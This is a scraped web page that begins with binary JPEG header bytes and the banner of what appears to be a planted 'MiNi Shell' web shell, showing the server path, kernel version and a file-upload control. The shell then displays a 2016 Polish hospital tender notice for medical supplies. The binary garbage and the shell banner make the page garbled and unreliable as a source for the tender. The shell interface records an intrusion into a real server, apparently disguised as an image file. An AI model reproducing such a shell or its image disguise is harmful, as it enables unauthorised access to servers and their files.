JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160119/6913-N-2016.html

<p class="kh_header"><b>Opole: P/1/2016  ZAKUP I DOSTAWA DROBNEGO SPRZĘTU MEDYCZNEGO.</b><br>
<b>Numer ogłoszenia: 6913 - 2016; data zamieszczenia: 19.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Zespół Neuropsychiatryczny im. św. Jadwigi , ul. Wodociągowa 4, 45-221 Opole, woj. opolskie, tel. 077 5414100, faks 077 5414237.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszn.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> P/1/2016  ZAKUP I DOSTAWA DROBNEGO SPRZĘTU MEDYCZNEGO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zakup i dostawa  drobnego sprzętu medycznego  dla Zamawiającego  
z siedzibą ul. Wodociągowej 4, 45-221 Opole, zgodnie z wykazem asortymentowo-cenowym stanowiącym Załącznik nr 1A do specyfikacji zwanej w dalszej części SIWZ z podziałem na 27 pakietów:
PAKIET 1 - STRZYKAWKI
PAKIET 2 - STRZYKAWKI do pomp infuzyjnych
PAKIET 3 - STRZYKAWKI do aparatu do gazometrii ABL80 BASIC
PAKIET 4 - IGŁY, KANIULE
PAKIET 5 - ZESTAWY DO WKŁUCIA CENTRALNEGO
PAKIET 6 -  CEWNIKI DO ODSYSANIA I MASKI TLENOWE
PAKIET 7 -  PRZYRZĄDY DO INFUZJI
PAKIET 8 -  PRZEDŁUŻACZE DO POMP
PAKIET 9 - POJEMNIKI NA ZUŻYTY SPRZĘT
PAKIET 10 - KIELISZKI DO LEKARSTW
PAKIET 11 - NICI CHIRURGICZNE
PAKIET 12 - KUBKI POJNIKI
PAKIET 13 - RÓŻNE PRODUKTY MEDYCZNE
PAKIET 14 - MYJKI DO MYCIA CIAŁA PACJENTA
PAKIET 15 - CEWNIKI UROLOGICZNE I WORKI NA MOCZ
PAKIET 16 - PRZEDŁUŻENIE GIĘTKIE
PAKIET 17 - STRZYKAWKI BEZPIECZNE
PAKIET 18 - RĘCZNIKI KĄPIELOWE JEDNORAZOWE
PAKIET 19 - PAPIER DO APARATURY
PAKIET 20 - FILTRY DO SSAKA
PAKIET 21 - ELEKTRODY I AKCESORIA DO APARATU   EMG KEYPOINT FIRMY MEDTRONIC A/S
PAKIET 22 - Układ oddechowy jednorazowego użytku do respiratora ENGSTROM
PAKIET 23 - FILTRY DO RESPIRATORÓW
PAKIET 24 - Materiały zużywalne do gazometru ABL80 BASIC
PAKIET 25 - RURKI INTUBACYJNE 
PAKIET 26 - MASKI ANESTETYCZNE
PAKIET 27 - SZCZOTECZKI DO CHIRURGICZNEGO MYCIA RĄK.
2.Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1A do SIWZ, zawierający wymagania jakościowe,  techniczne i  ilościowe.
3.Wymagania dotyczące przedmiotu zamówienia:
Oferowany przedmiot zamówienia  musi  spełniać wymagania  określone w :  
Ustawie z dnia 20 maja  2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107 poz. 679), 
Rozporządzeniu Ministra Zdrowia z dnia 5 listopada 2010 r. w sprawie sposobu kwalifikacji wyrobów medycznych  (Dz. U. z 2010 r. Nr 215, poz. 1416),
Rozporządzeniu Ministra Zdrowia z dnia 12 stycznia  2011 r.  w sprawie wymagań zasadniczych  oraz procedur zgodności  wyrobów medycznych  (Dz. U. z 2011 r. Nr 16, poz. 74),
Rozporządzeniu Ministra zdrowia z dnia 22 września 2010 r. w sprawie znaku CE (Dz.  U. z 2010 r., nr 186, poz. 1252),
Dyrektywie 2007/47/EC z 21.09.2007 r. zmieniającej Dyrektywę 93/42/EWG z dnia 14 kwietnia 1993 r. - dotyczącej  wyrobów medycznych.  
Przedmiot zamówienia musi być dopuszczony do obrotu na terenie RP i posiadać Deklaracje Zgodności (oświadczenie wytwórcy lub jego autoryzowanego przedstawiciela, stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z wymaganiami zasadniczymi). Ponadto Wykonawca winien dysponować formularzem Powiadomienia/Zgłoszenia Prezesa Urzędu Rejestracji Wyrobów Medycznych zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107 poz. 679, art. 2 ust. 1 pkt 12, art. 58, art. 59, art. 60, art. 64.1, art. 133 oraz art. 134) lub dokumentem potwierdzającym przeniesienie danych z Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania do bazy danych,  o której mowa w art. 64 ust. 1 ustawy o wyrobach medycznych (art. 133 ustawy o wyrobach medycznych z dnia 10 maja 2010 r.).
4. Zamawiający zastrzega, że podane ilości są ilościami szacunkowymi i mogą ulec zmniejszeniu o 30% w zależności od przyszłych potrzeb Zamawiającego (prawo opcji).  Z uwagi na to faktycznie  zamówione ilości stanowić będą rzeczywiste zapotrzebowanie na ww. sprzęt medyczny. Wykonawcy nie przysługują żadne roszczenia z tytułu zrealizowania umowy poniżej wartości, na którą zostanie zawarta z zachowaniem ww. reguły.
5.Termin wykonania zamówienia dla wszystkich pakietów: 12 m-cy od daty złożenia pierwszego zamówienia cząstkowego.
6.Termin wykonania zamówień cząstkowych dla wszystkich pakietów poza 21: max do 3 dni roboczych od złożenia zamówienia cząstkowego. 
7.Termin wykonania zamówień cząstkowych dla pakietu 21: max do 21 dni roboczych od złożenia zamówienia cząstkowego. 
8.Wybór formy składania zamówienia należy do Zamawiającego zgodnie z postanowieniami wzoru umowy - załącznik nr 2..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.14.12.20-8, 33.14.13.00-3, 33.14.13.10-6, 33.14.13.20-9, 33.19.00.00-8, 33.14.11.21-4, 33.14.14.11-4, 33.14.16.40-8, 33.14.16.41-5, 33.15.71.10-9, 33.19.41.20-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 27.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1 Zamawiający wymaga załączenia do oferty:
a)	deklaracja zgodności - oświadczenie wytwórcy lub jego autoryzowanego przedstawiciela, stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z wymaganiami zasadniczymi - art. 2.1 pkt 11)  ustawy z dnia 20 maja 2010 r. o wyrobach medycznych - dotyczy wyłącznie wyrobów medycznych;
b)	certyfikat zgodności - dokument wydany przez jednostkę notyfikowaną w zakresie wyrobów, poświadczający przeprowadzenie procedury oceny zgodności, potwierdzającej, że należycie zidentyfikowany wyrób, jego projekt, typ, proces wytwarzania, sterylizacji lub kontroli i badań końcowych jest zgodny z wymaganiami zasadniczymi - art. 2.1 pkt 8) ustawy z dnia 20 maja 2010 r. o wyrobach medycznych - nie dotyczy klasy I wyrobów medycznych ;
c)	formularz Powiadomienia/Zgłoszenia Prezesa Urzędu Rejestracji Wyrobów Medycznych zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107 poz. 679, art. 2 ust. 1 pkt 12, art. 58, art. 59, art. 60, art. 64.1, art. 133 oraz art. 134) lub dokumentem potwierdzającym przeniesienie danych z Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania do bazy danych,  o której mowa w art. 64 ust. 1 ustawy 
o wyrobach medycznych (art. 133 ustawy o wyrobach medycznych z dnia 10 maja 2010 r.) - dotyczy wyłącznie wyrobów medycznych;
UWAGA NR 1:
Na każdym z ww. dokumentów dołączonych do oferty należy dokonać adnotacji, której pozycji asortymentowej i którego pakietu dotyczy dokument.
d) Próbki, w celu potwierdzenia zgodności oferowanych produktów z opisem w SIWZ:
Dla poz. 1 pakietu 1: po jednej sztuce strzykawki;
Dla poz. 13 i 14 pakietu 4 : po jednej sztuce kaniuli;
Dla poz. 2 i 3  pakietu 5: po jednym zestawie do wkłucia centralnego;
Dla poz. 1 pakietu 6: jedna sztuka cewnika do odsysania górnych dróg oddechowych;
Dla poz. 1, 2 i 3  pakietu 7: po jednej  sztuce przyrządu;
Dla poz. 1, 2 i 3 pakietu 9 : po jednym pojemniku;
Dla poz. 1 i 2 pakietu 10 : po jednym kieliszku do lekarstw;
Dla poz. 1, 2  i 3 pakietu 14 : dla każdej pozycji - opakowanie rękawic do mycia ciała pacjenta 
w przypadku opakowania zawierającego więcej niż jedna sztukę lub jedną sztukę rękawicy  konfekcjonowanej pojedynczo;
Dla pozycji 6 z pakietu 19: 1 rolka papieru;
Dla poz. 1 z pakietu 20: 1 szt. filtru do ssaka;
Dla  wszystkich poz. od 1 do 14 włącznie z pakietu 25: po jednej sztuce rurki intubacyjnej;
Dla poz. 15 z pakietu 25:  1 szt. rurki tracheostomijnej;
Dla poz. 23 z pakietu 25: 1 sztuka cewnika do podawania tlenu przez nos;
Dla poz. 24 z pakietu 25: 1 sztuka nawilżacza typu sztuczny nos.

UWAGA: Opis sposobu badania dostarczonych próbek:
Badanie dołączonych do oferty próbek ma stwierdzić w przypadku próbek:
 - dla poz. 1 z  pakietu 1: czy dodatkowo zapisane informacje  na tłoku zaoferowanej strzykawki insulinowej znajdują się w miejscu umożliwiającym prawidłowy odczyt skali, tzn. z boku skali lub poniżej skali; 
-  dla poz. 13 i 14 z pakietu 4: czy oferowana kaniula w poz. 13 jest dwuportowa, w poz. 14 - czy oferowana kaniula jest dwuportowa i wyposażona w automatyczny mechanizm bezpieczeństwa chroniący przed zakłuciem podczas użycia i po użyciu kaniuli,
-  dla poz. 2 i 3 z pakietu 5: czy metalowy prowadnik zestawu do wkłucia nie ulega odkształceniu przy wprowadzaniu przez światło rozszerzacza i czy  rozszerzacz (dilatator) wykonany jest z trwałego materiału nieulegającego rozwarstwieniu przy zakładaniu i usuwaniu metalowego prowadnika;
-  dla poz. 1 z pakietu 6: czy oferowany cewnik o odsysania górnych dróg oddechowych jest wyposażony w miękką końcówką, atraumatyczną nie powodujące uszkodzeń błony śluzowej górnych dróg oddechowych i dł. 50 - 60 cm, pakowany pojedynczo-opakowanie folia papier,
-  dla poz. 1, 2 i 3  z pakietu 7: czy oferowany w każdej z pozycji przyrząd jest pozbawiony ftalanów oraz w przypadku poz. 1 i 2 dodatkowo czy przyrząd posiada precyzyjny zacisk  rolkowy pozwalający na dokładne ustawienie przepływu  płynów,
-  dla poz. 1, 2 i 3 z pakietu 9: czy oferowane w  poz. 1, 2 i 3 pojemniki jednorazowe na zużyty  sprzęt medyczny są okrągłe, wyposażone w otwór wrzutowy z zamykanym klipsem, ze szczelnym zamknięciem,
-  dla poz. 1 i 2 z pakietu 10: czy oferowane w obu pozycjach kieliszki do lekarstw są zwężane ku dołowi oraz czy maksymalna średnica podstawy kieliszka wynosi  3,5 cm.
-  dla poz. 1, 2  i 3 z pakietu 14: czy oferowane myjki są: jednorazowe, trwałe, mają postać  rękawicy lub inną  wymagana opisem Załącznika nr 1 A do SIWZ, są nasączone środkiem myjącym z obu stron, który uaktywnia się pod wpływem wody, odporne na rozdzieranie w trakcie mycia pacjenta, o rozmiarach nie mniejszych niż wskazane w opisie dla każdej z pozycji  i o gramaturze nie mniejszej niż opisana w  poz. 1 i 2 oraz czy myjka z poz. 3 wykonana jest z polieteru. 
- dla poz. 6 z pakietu 19: czy zaoferowany papier jest kompatybilny z posiadanym urządzeniem (defibrylatorem);
- dla poz. 1 z pakietu 20: czy zaoferowany filtr antybakteryjny do ssaka jest kompatybilny z posiadanym ssakiem;
- dla wszystkich poz. od 1 do 14 włącznie z pakietu 25: czy zaoferowane w tych pozycjach rurki intubacyjne są kompatybilne z zaproponowanym w poz. 24 nawilżaczem typu sztuczny nos;
- dla poz. 15 z pakietu 25: czy zaoferowana w tej pozycji rurka tracheostomijna jest kompatybilna z zaproponowanym w poz. 24 nawilżaczem typu sztuczny nos;
- dla poz. 23 z pakietu 25:  czy zaoferowany cewnik do podawania tlenu przez nos jest kompatybilny z zaproponowanym w poz. 24 nawilżaczem typu sztuczny nos;
- dla poz. 24 z pakietu 25: czy zaoferowany w poz. 24  nawilżacza typu sztuczny nos jest kompatybilny z zaproponowanymi w poz. od 1 do 14 włącznie rurkami intubacyjnymi, zaoferowaną w poz. 15 rurką tracheostomijną  i cewnikiem zaoferowanym w poz. 23 pakietu 25.
W trakcie całego trwania umowy Zamawiający będzie sprawdzał i wymagał aby dostawy częściowe przebiegały zgodnie z ofertą.
UWAGA:
Wykonawca zobowiązany będzie dostarczyć oferowany produkt - próbkę w opakowaniu jednostkowym zaopatrzonym w etykietę w języku polskim  opisaną zgodnie z  załącznikiem nr 1 pkt. 13 Rozporządzenia Ministra Zdrowia z dnia 12 stycznia 2011r. w sprawie wymagań zasadniczych oraz procedur oceny zgodności  wyrobów medycznych. 
Wykonawca, z którym zostanie zawarta umowa na dostawy pozostawi w siedzibie Zamawiającego dostarczone próbki oferowanych wyrobów wraz z opakowaniem handlowym lub jego etykietą, które pozostaną u Zamawiającego przez okres 4 lat. W przypadku pozostałych Wykonawców, 
z którymi Zamawiający nie zawrze umowy dołączone przez nich próbki będą odesłane na ich pisemny wniosek na koszt  wnioskodawcy. Zamawiający wyraża zgodę na prezentację oferowanych wyrobów w dniu otwarcia ofert, bezpośrednio po otwarciu ofert. 
e) Dokumenty potwierdzające kompatybilność  zaoferowanych w pakiecie 2 strzykawek w poz. 1 i 2 do pomp wskazanych w tych pozycjach (pompy firmy MEDIMA  i ASCOR). Dokumenty mają potwierdzać, że zaoferowane w pakiecie 2 strzykawki są w pełni kompatybilne ze wskazanymi w tym pakiecie pompami,
f) Ulotka informacyjna w j. polskim: dla poz. 13 i 14  z pakietu 4 (z załączonych ulotek winno wynikać jaka jest maksymalna długość utrzymania kaniuli w naczyniu krwionośnym),
g) Ulotka informacyjna w j. polskim: dla poz. 16 z pakietu 4 (w załączonej ulotce winny być zawarte informacje na temat sposobu dezynfekcji membrany przed podaniem leku oraz maksymalnego czasu użytkowania),
h) Ulotka informacyjna w j. polskim: dla poz. 1, 2 i 3  z pakietu 5 (z załączonych ulotek winno wynikać jaka jest maksymalna długość utrzymania cewnika do wkłucia centralnego w naczyniu krwionośnym),
i) Ulotka informacyjna w j. polskim: dla poz. 1 i 2  z pakietu 15 (z załączonych ulotek winno wynikać jaka jest maksymalna długość utrzymania cewnika w pęcherzu moczowym).

Wszystkie dokumenty muszą być ważne przez  okres na jaki zostanie zawarta  umowa art. 10.1 ustawy o wyrobach medycznych Zabrania się wprowadzania do obrotu wyrobów, jeżeli dotyczące ich certyfikaty zgodności utraciły ważność, zostały wycofane lub zawieszone oraz art. 94.1 ustawy o wyrobach medycznych Kto wprowadza do obrotu wyroby, których certyfikaty zgodności wydane przez jednostki notyfikowane utraciły ważność, zostały zawieszone lub wycofane, podlega grzywnie, karze ograniczenia wolności albo pozbawienia wolności do roku.
W przypadku kończącego się terminu ważności dokumentu Wykonawca ma obowiązek dostarczyć wymagany aktualny dokument w następnym dniu po dniu utraty terminu ważności dokumentu. W przypadku gdy dokument traci ważność podczas trwania umowy Wykonawca musi załączyć do aktualnego dokumentu oświadczenie, że dostarczy przedłużenie dokumentu do siedziby Zamawiającego.  
W przypadku gdy dokument traci ważność przed podpisaniem umowy  Wykonawca wraz z egzemplarzem podpisanej umowy dostarczy Zamawiającemu aktualny dokument.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz OFERTA PRZETARGOWA stanowiący Załącznik nr 1 do specyfikacji wraz z wypełnionymi formularzami - Załącznik nr 1A, 3, 4 i  5 do specyfikacji;
2. Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa powinna jednoznacznie określać czynności, co do wykonywania, których pełnomocnik jest upoważniony.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin wymiany wadliwego asortymentu - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
